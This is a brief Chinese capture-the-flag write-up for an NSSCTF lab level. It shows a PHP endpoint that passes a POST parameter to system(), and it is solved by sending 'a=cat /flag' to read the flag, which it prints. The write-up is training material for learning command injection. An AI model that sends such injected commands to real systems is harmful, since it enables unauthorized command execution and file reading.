开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
m0_748233177 小时前
PHP版本演进:从7.x到8.x全解析zhengfei6117 小时前
精选的优秀法证分析工具和资源列表changyunkeji7 小时前
电缆敷设机就找长云科技三水不滴8 小时前
Apache RocketMQ的原理与实践REDcker8 小时前
RFC1918私有IP地址空间详解孞㐑¥8 小时前
算法—链表枷锁—sha8 小时前
【CTFshow-pwn系列】06_前置基础【pwn 035】详解:利用 SIGSEGV 信号处理机制EverydayJoy^v^8 小时前
RH134学习进程——十一.管理网络安全晚霞的不甘8 小时前
Flutter for OpenHarmony智能穿搭推荐:构建一个实用又美观的个性化衣橱助手源代码•宸9 小时前
Golang面试题库(Interface、GMP)